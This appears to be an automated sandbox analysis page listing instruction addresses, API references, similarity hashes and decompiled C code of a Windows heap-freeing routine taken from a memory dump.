0x6ab934fd
0x6ab934fe
0x6ab934b0
0x6ab934b0
0x6ab934b5
0x6ab934b8
0x6ab934b8
0x6ab934bc
0x6ab934ce
0x6ab934d3
0x6ab934d3
0x00000000
0x6ab934bc
0x6ab931c1
0x6ab931c4
0x6ab931c7
0x6ab93482
0x6ab93489
0x6ab9348e
0x6ab93494
0x6ab93498
0x6ab9349b
0x6ab934a1
0x6ab934a4
0x00000000
0x00000000
0x6ab934aa
0x6ab934aa
0x6ab934ad
0x6ab934ae
0x6ab934af
0x00000000
0x6ab934af
0x6ab931cd
0x6ab931dc
0x6ab931e1
0x6ab931ef
0x6ab931f1
0x6ab931f4
0x6ab931f6
0x6abd5f1f
0x6abd5f28
0x6abd5f2c
0x6abd5f2f
0x6abd5f3a
0x6abd5f42
0x6abd5f47
0x6abd5f51
0x6abd5f56
0x6abd5f59
0x6abd5f5d
0x6abd5f5f
0x6abd5f65
0x6abd5f6b
0x6abd5f71
0x6abd5f71
0x6abd5f71
0x6abd5f71
0x6abd5f77
0x6abd5f7b
0x6abd5f89
0x6abd5f8e
0x6abd5f8e
0x6abd5f91
0x00000000
0x6abd5f91
0x6ab93201
0x6ab93203
0x6ab93206
0x6ab93208
0x00000000
0x00000000
0x6ab93211
0x6ab93218
0x6ab9321e
0x6ab93226
0x6ab9322b
0x6ab93233
0x6ab9323b
0x6ab9323f
0x6ab93250
0x6ab93255
0x6ab93258
0x6ab9325b
0x6ab9325e
0x6ab93260
0x6abd5f18
0x6ab93266
0x6ab93266
0x6ab93269
0x6ab9326f
0x6ab93275
0x6ab93275
0x6ab93275
0x6ab93275
0x6ab9327b
0x6ab9327f
0x6ab9328d
0x6ab93292
0x6ab93292
0x6ab93295
0x6ab93299
0x6ab932a4
0x6ab932a9
0x6ab932a9
0x6ab932bc
0x6ab932c1
0x6ab932c4
0x00000000
0x6ab932c4
0x6ab93139
0x6ab9313f
0x6ab93142
0x6ab9314b
0x6ab9314b
0x6ab93142
0x00000000
0x6ab93139
0x6ab93131
0x6ab9318b
0x00000000
0x6ab9318b
0x6ab932c7
0x6ab932c7
0x6ab932ca
0x00000000
0x6ab932ca
0x6abd5e77
0x6abd5e7a
0x6abd5e7c
0x6abd5e8f
0x6abd5e8f
0x00000000
0x6abd5e7e
0x6abd5e7f
0x6abd5e84
0x6abd5e87
0x6abd5e89
0x00000000
0x00000000
0x00000000
0x6abd5e89
0x6abd5e7c
0x6ab9303e
0x6ab93042
0x6ab9304f
0x6ab93054
0x6ab93057
0x00000000
0x6ab92ffc
0x6ab92ffc
0x6ab92ffc
0x6ab92ffe
0x6ab93001
0x6ab93001
0x6ab93003
0x00000000
0x00000000
0x6ab93005
0x6ab9300a
0x00000000
0x6ab93010
0x6ab93010
0x00000000
0x6ab93010
0x6ab9300a
0x00000000
0x6ab93001
0x6ab92ffa

APIs

RtlEnterCriticalSection.1105(?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB9304F
RtlSizeHeap.1105(?,00000000,00000000,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB931DC
memcpy.1105(00000000,00000000,00000000,?,00000000,00000000,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB9321E
memcpy.1105(00000000,6AC579A0,00000000,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB93233
memcpy.1105(-00000002,00000000,?,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB93250
memset.1105(6AC58220,00000000,00000234,?,?,?,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE), ref: 6AB9328D
RtlLeaveCriticalSection.1105(?,?,?,?,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB932A4
RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE), ref: 6AB932BC
RtlSizeHeap.1105(?,00000000,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB93342
memcpy.1105(00000000,00000000,00000000,?,00000000,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB9339B
memcpy.1105(00000000,?,00000000,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB933B7
memcpy.1105(-00000002,00000000,00000000,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB933DD
memcpy.1105(-00000002,00000000,?,?,?,?,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE), ref: 6AB93402
memset.1105(6AC58220,00000000,00000234,?,?,?,?,?,?,?,?,?,0000003A,6AC579A0,?,00000000), ref: 6AB9341D
RtlLeaveCriticalSection.1105(?,?,?,?,?,?,?,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28), ref: 6AB93457
RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,?,?,?,?,?,0000003A,6AC579A0,?,00000000), ref: 6AB9346E
memcpy.1105(00000000,6AC579A0,00000000,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB93489
memmove.1105(6AB92F61,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB934B0
memset.1105(6AC58220,00000000,00000234,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB934CE
memmove.1105(00000002,00000000,?,?,00000000,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB93513
memcpy.1105(00000000,?,00000000,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB93522
memset.1105(6AC58220,00000000,00000234,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB9353D
memcpy.1105(-00000002,00000000,00000000,?,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB93563
RtlIsCriticalSectionLockedByThread.1105(?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6ABD5E7F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$CriticalHeapSectionmemset$FreeLeaveSizememmove$EnterLockedThread
String ID:
API String ID: 3971764801-0
Opcode ID: b2025a0a03ea78c53130cb4a4a68ffa8b00b7af479d3673e885728449e1357a7
Instruction ID: f9dc0ddb3efd91950477bf7e7f1df7f8583f78319ce63c9496d782062065a5e3
Opcode Fuzzy Hash: b2025a0a03ea78c53130cb4a4a68ffa8b00b7af479d3673e885728449e1357a7
Instruction Fuzzy Hash: E732B271E002999FCB14CFA8C884BEEBBB1FF56704F15412DE819AB391EB359911DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB899BF, Relevance: 33.8, APIs: 16, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E6AB899BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E6AC1FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E6AC2A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E6ABBD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E6AB6B150();
										} else {
											E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E6AB6B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x6ac56378 = 1;
											asm("int3");
											 *0x6ac56378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E6AB8A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E6AB8A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E6AB8BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E6AC2A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E6AB8A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E6AB8A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E6ABBD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E6AB6B150();
								} else {
									E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E6AB6B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x6ac56378 = 1;
									asm("int3");
									 *0x6ac56378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E6AC1FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E6AC2A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E6ABBD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E6AB6B150();
													} else {
														E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E6AB6B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x6ac56378 = 1;
														asm("int3");
														 *0x6ac56378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E6AB8A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E6AB8A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E6AB8BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E6AC2A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E6ABBD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E6AB6B150();
													} else {
														E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E6AB6B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x6ac56378 = 1;
														asm("int3");
														 *0x6ac56378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E6AB8A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E6AB8A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E6AB8BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E6AB8BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x6ab899ca
0x6ab899cc
0x6ab899df
0x6ab899e3
0x6ab899f8
0x6ab899fb
0x6ab899fb
0x00000000
0x6ab89a48
0x6ab89a48
0x6ab89a4c
0x6ab89a51
0x6ab89a55
0x6ab89a61
0x6ab89a66
0x6ab89a68
0x6abd1457
0x6abd145c
0x6abd145c
0x6ab89a68
0x6ab89a6e
0x6ab89a71
0x6ab89a74
0x6ab89a76
0x6abd1466
0x6abd1469
0x6abd1469
0x6abd146c
0x6abd146e
0x6abd1471
0x6abd1474
0x6abd1477
0x6abd1479
0x6abd159c
0x6abd159c
0x6abd159d
0x6abd15a6
0x6abd15ab
0x6abd15ab
0x00000000
0x6abd15ab
0x6abd147f
0x6abd1481
0x00000000
0x00000000
0x6abd148a
0x6abd148d
0x6abd1493
0x6abd1495
0x6abd14c0
0x6abd14c0
0x6abd14c3
0x6abd14c6
0x6abd14c8
0x6abd14cb
0x6abd14cf
0x6abd14f2
0x6abd14f2
0x6abd14f5
0x6abd14f8
0x6abd1501
0x6abd1508
0x6abd150b
0x6abd150e
0x6abd1510
0x6abd1513
0x6abd1515
0x6abd1515
0x6abd1518
0x6abd1518
0x6abd1513
0x6abd1521
0x6abd1525
0x6abd152a
0x6abd152d
0x6abd1530
0x6abd1532
0x6abd1539
0x6abd153d
0x6abd155d
0x6abd1562
0x6abd153f
0x6abd1555
0x6abd155a
0x6abd1570
0x6abd1577
0x6abd157c
0x6abd1582
0x6abd1585
0x6abd1589
0x6abd158b
0x6abd1592
0x6abd1593
0x6abd1593
0x6abd1589
0x6abd1530
0x00000000
0x6abd14f8
0x6abd14d5
0x6abd14da
0x6abd14dc
0x00000000
0x6abd14de
0x6abd14e8
0x00000000
0x6abd14e8
0x6abd1497
0x6abd1497
0x6abd14a4
0x6abd14a4
0x6abd14a7
0x6abd14a9
0x6abd14ab
0x6abd14ab
0x6abd149c
0x6abd149e
0x6abd14a0
0x6abd14b0
0x6abd14b0
0x00000000
0x6abd14a2
0x6abd14a2
0x00000000
0x6abd14a2
0x6abd14a0
0x6abd14b3
0x6abd14bb
0x00000000
0x6abd14bb
0x6abd1495
0x6ab89a7c
0x6ab89a7c
0x6ab89a7f
0x6ab89a7f
0x6ab89a82
0x6ab89a84
0x6ab89a87
0x6ab89a8a
0x6ab89a8d
0x6ab89a8f
0x6abd166a
0x6abd166a
0x6abd166b
0x6abd1674
0x00000000
0x6abd1674
0x6ab89a95
0x6ab89a97
0x00000000
0x00000000
0x6ab89aa0
0x6ab89aa3
0x6ab89aa9
0x6ab89aab
0x6ab89ad7
0x6ab89ad7
0x6ab89ada
0x6ab89add
0x6ab89adf
0x6ab89ae2
0x6ab89ae6
0x6ab89b22
0x6ab89b27
0x6ab89b29
0x00000000
0x6ab89b2b
0x6abd15be
0x00000000
0x6abd15be
0x6ab89b29
0x6ab89ae8
0x6ab89ae8
0x6ab89aeb
0x6ab89aee
0x6abd15cb
0x6abd15d2
0x6abd15d5
0x6abd15d7
0x6abd15da
0x6abd15dc
0x6abd15dc
0x6abd15dc
0x6abd15da
0x6abd15e5
0x6abd15e9
0x6abd15ee
0x6abd15f1
0x6abd15f3
0x6abd15f9
0x6abd1600
0x6abd1604
0x6abd1624
0x6abd1629
0x6abd1606
0x6abd161c
0x6abd1621
0x6abd1637
0x6abd163e
0x6abd1643
0x6abd1649
0x6abd164c
0x6abd1650
0x6abd1656
0x6abd165d
0x6abd165e
0x6abd165e
0x6abd1650
0x6abd15f3
0x6ab89af4
0x6ab89af7
0x6ab89afc
0x6ab89b00
0x6ab89b04
0x6ab89b08
0x6ab89b14
0x6ab899fe
0x6ab89a04
0x6ab89a07
0x00000000
0x6ab89a29
0x6abd169c
0x6abd16a0
0x6abd16a5
0x6abd16a9
0x6abd16b5
0x6abd16ba
0x6abd16bc
0x6abd16be
0x6abd16c3
0x6abd16c3
0x6abd16bc
0x6abd16c8
0x6abd16cc
0x6abd181b
0x6abd181b
0x6abd181e
0x6abd181e
0x6abd1821
0x6abd1823
0x6abd1826
0x6abd1829
0x6abd182c
0x6abd182e
0x6abd1688
0x6abd1688
0x6abd1689
0x6abd168b
0x6abd168c
0x6abd168d
0x6abd168f
0x6abd1692
0x00000000
0x6abd1692
0x6abd1834
0x6abd1836
0x00000000
0x00000000
0x6abd183f
0x6abd1842
0x6abd1848
0x6abd184a
0x6abd1875
0x6abd1875
0x6abd1878
0x6abd187b
0x6abd187d
0x6abd1880
0x6abd1884
0x6abd18a7
0x6abd18a7
0x6abd18aa
0x6abd18ad
0x6abd18b6
0x6abd18bd
0x6abd18c0
0x6abd18c3
0x6abd18c5
0x6abd18c8
0x6abd18ca
0x6abd18ca
0x6abd18cd
0x6abd18cd
0x6abd18c8
0x6abd18d5
0x6abd18da
0x6abd18df
0x6abd18e2
0x6abd18e5
0x6abd18e7
0x6abd18ee
0x6abd18f2
0x6abd1912
0x6abd1917
0x6abd18f4
0x6abd190a
0x6abd190f
0x6abd1925
0x6abd192c
0x6abd1931
0x6abd193a
0x6abd193e
0x6abd1940
0x6abd1947
0x6abd1948
0x6abd1948
0x6abd193e
0x6abd18e5
0x6abd194f
0x6abd1952
0x6abd1956
0x6abd195d
0x6abd1961
0x6abd196d
0x00000000
0x6abd196d
0x6abd188a
0x6abd188f
0x6abd1891
0x00000000
0x00000000
0x6abd189d
0x00000000
0x6abd189d
0x6abd184c
